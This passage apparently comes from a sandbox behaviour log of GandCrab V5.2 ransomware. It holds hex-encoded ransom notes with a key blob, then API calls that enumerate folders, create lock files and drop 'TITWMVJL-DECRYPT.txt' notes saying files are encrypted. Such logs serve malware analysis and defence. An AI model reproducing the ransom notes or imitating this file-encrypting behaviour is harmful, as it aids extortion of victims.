\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.941] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0073.942] CloseHandle (hObject=0x2c4) returned 1 [0073.942] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.942] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.942] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x13, wMilliseconds=0x106)) [0073.942] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.943] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.943] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.943] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock") returned 94 [0073.943] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0073.944] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.944] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\") returned 70 [0073.945] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0073.945] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5036f8 [0073.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.945] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.945] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.945] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.945] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.945] lstrcmpW (lpString1="16", lpString2=".") returned 1 [0073.945] lstrcmpW (lpString1="16", lpString2="..") returned 1 [0073.945] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="16" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0073.945] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\" [0073.945] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.946] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.947] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.947] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\\\TITWMVJL-DECRYPT.txt") returned 94 [0073.947] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0073.947] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\